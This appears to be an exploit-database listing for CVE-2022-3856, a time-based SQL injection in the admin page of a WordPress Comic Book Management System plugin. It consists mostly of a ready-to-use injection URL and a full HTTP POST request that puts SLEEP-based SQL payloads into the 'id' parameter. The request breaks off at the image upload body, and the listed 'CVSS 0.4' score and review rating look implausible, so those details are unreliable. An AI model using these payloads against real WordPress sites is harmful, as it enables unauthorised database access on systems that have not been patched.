Exploit for Comic Book Management System < 2.2.0 - Admin+ SQLi CVE-2022-3856

Name: Exploit for Comic Book Management System < 2.2.0 - Admin+ SQLi CVE-2022-3856
Rating: 5 (210 reviews)

2022-11-14 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:C0F5CF61-B3E2-440F-A185-61DF360C1192
https://example.com/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)


POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707
Content-Length: 733
Origin: http://localhost:8080
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="id"

2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf)
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png"
Content-Type: image/png

PNG